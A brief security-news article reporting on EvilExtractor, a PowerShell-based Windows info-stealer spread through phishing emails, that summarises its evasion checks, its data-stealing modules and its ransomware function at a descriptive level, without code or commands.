A phishing campaign, ongoing since March, has been actively targeting Microsoft Windows users in Europe and the U.S. The campaign uses a malcious tool called EvilExtractor (or Evil Extractor) that poses as an educational tool, developed by a company known as Kodex. Released in October 2022, the tool is being constantly upgraded for enhanced malicious capabilities.
EvilExtractor - A multi-module threat
According to Fortinet, EvilExtractor is developed to target Windows and steal data and files from endpoint devices. It comes with various modules that work using an FTP service.
- This tool pretends to be a genuine file, such as a Dropbox or Adobe PDF, being distributed via phishing emails.
- Once loaded, it uses PowerShell for carrying out malicious activities.
- This includes checking for the environment, including anti-virtual machines and VirusTotal’s malware scanning capabilities to avoid detection.
- The tool comes with a ransomware function, named Kodex Ransomware, for encrypting compromised systems.
Operational details
The primary code of EvilExtractor is a PowerShell script that includes various modules, such as date time checking, anti-sandbox/VM/Scanner, FTP server setting, stealing data, clearing logs, and uploading stolen data.
- The malware first checks if the system’s date is between November 9, 2022, and April 12, 2023. Subsequently, it compares the product model with a predefined list of 187 products, including VMWare, Hyper-V, VirusTotal or other virtual machines or sandboxes.
- It then downloads three components, KK2023[.]zip (used for stealing browser data), Confirm[.]zip (a keylogger), and MnMs[.]zip (a webcam extractor).
- It extracts files with certain extensions from the Desktop and Download folders, such as jpeg, jpg, png, and mp3. Further, it uses the CopyFromScreen command to capture a screenshot.
Conclusion
EvilExtractor appears a capable info-stealer that is equipped with multiple malicious features that are being upgraded by its authors for new functions and improved persistence. Thus, users should have awareness of this new info-stealer and beware of suspicious mail received from unknown sources.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_337447835.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/6a2d_shutterstock_2091277222.jpg)
